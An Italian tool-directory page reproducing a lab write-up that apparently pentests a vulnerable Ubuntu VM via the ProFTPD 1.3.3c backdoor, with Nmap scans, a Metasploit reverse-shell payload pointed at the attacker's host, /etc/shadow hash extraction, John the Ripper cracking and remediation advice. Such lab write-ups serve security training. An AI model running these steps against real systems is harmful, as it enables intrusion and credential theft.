Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Offensive-lab-2 — Guida passo-passo al test di penetrazione su una VM Ubuntu vulnerabile. Sfruttato il backdoor di ProFTPD 1.3.3c (CVE-2010-4221) per ottenere l'accesso root e catturare la flag. Include enumerazione con Nmap, configurazione del payload di Metasploit e cracking degli hash utente (John the Ripper). | Kitploit
Strumenti/GitHubGitHub/mafiosohack/offensive-lab-2
Password CrackingRicognizioneFramework di ExploitScansione PorteAnalisi delle VulnerabilitàExploitPost-ExploitCTFPenetration Testing

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Guida passo-passo al test di penetrazione su una VM Ubuntu vulnerabile. Sfruttato il backdoor di ProFTPD 1.3.3c (CVE-2010-4221) per ottenere l'accesso root e catturare la flag. Include enumerazione con Nmap, configurazione del payload di Metasploit e cracking degli hash utente (John the Ripper).

Apprendimento e Formazione
Lab e Pratica
GitHubmafiosohack/offensive-lab-2

Offensive-lab-2

Vedi Repository
59 mesi faNon ancora revisionato
Condividi

Laboratorio di sicurezza offensiva : ProFTPD 1.3.3c Backdoor Exploit (Flag di root)

  1. Introduzione e obiettivi

Questo report descrive il test di penetrazione eseguito su una macchina virtuale (VM) Linux vulnerabile, concentrandosi sull'identificazione di una vulnerabilità di servizio ad alto rischio che ha consentito l'accesso root immediato.

DettaglioValore
Indirizzo IP del target[ 192.168.222.130]
Indirizzo IP dell'attaccante (LHOST)[ 192.168.222.128]
SO del targetUbuntu 4ubuntu2.2 (Linux Kernel 3.x)
ObiettivoOttenere una shell di livello root e recuperare il file della flag.
  1. Enumerazione iniziale e identificazione della vulnerabilità

La ricognizione iniziale ha comportato una scansione dei servizi utilizzando Nmap per identificare le porte aperte e le versioni dei servizi.

Comando:

root@kitploit:~
sudo nmap -sS -sV 192.168.222.130

Risultati principali: | Porta | Servizio | Versione | Rischio | | :--- | :--- | :--- | :--- | 21/tcp | ftp | ProFTPD 1.3.3c | CRITICO (Backdoor sfruttabile) | | 22/tcp | ssh | OpenSSH 7.2p2 | Basso (Servizio standard) | | 80/tcp | http | Apache httpd 2.4.18 | Basso (Nessuna vulnerabilità web evidente trovata) |

Successivamente, una scansione con script per le vulnerabilità ha confermato l'esistenza di un backdoor estremamente critico all'interno del servizio FTP. L'output dello script Nmap ha mostrato esplicitamente l'esecuzione di comandi come utente root:

| ftp-proftpd-backdoor: | This installation has been backdoored. | Command: id |_ Results: uid=0(root) gid=0(root) groups=0(root)...

  1. Sfruttamento e acquisizione della shell root Il framework Metasploit è stato utilizzato per sfruttare il backdoor ProFTPD confermato.

Passaggi dello sfruttamento: Avvia Metasploit: msfconsole

Seleziona il modulo exploit: use exploit/unix/ftp/proftpd_133c_backdoor

Imposta le opzioni:

Bash

set RHOSTS 192.168.222.130 set PAYLOAD cmd/unix/reverse set LHOST 192.168.222.128

Risultato: una sessione di shell di comando è stata stabilita con successo, garantendo privilegi di root immediati (uid=0).

  1. Post-sfruttamento e recupero della flag Raccolta delle credenziali Gli hash degli utenti del sistema sono stati estratti da /etc/shadow per l'analisi post-sfruttamento. L'hash per l'utente marlinspike è stato decifrato con successo utilizzando John the Ripper.

Comando utilizzato (sulla macchina attaccante):

Bash

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt Credenziale decifrata:

Utente: marlinspike

Password: marlinspike

  1. Raccomandazioni di remediation La postura di sicurezza del sistema è estremamente debole a causa del servizio FTP compromesso. È necessario adottare immediatamente misure per mettere in sicurezza il sistema:

Patch/aggiornamento immediato: Il servizio ProFTPD deve essere immediatamente patchato o aggiornato a una versione sicura (superiore alla 1.3.3g) per correggere il backdoor noto e le relative CVE.

Rimozione del servizio: Se FTP non è richiesto per il funzionamento del sistema, il servizio dovrebbe essere completamente rimosso.

Configurazione del firewall: Implementare regole firewall rigide (iptables/ufw) per bloccare l'accesso esterno alla Porta 21.

Configurazioni sicure della shell: Rivedere le configurazioni SSH per disabilitare il login di root e imporre l'autenticazione basata su chiave. Esegui: exploit

Scarica lo strumento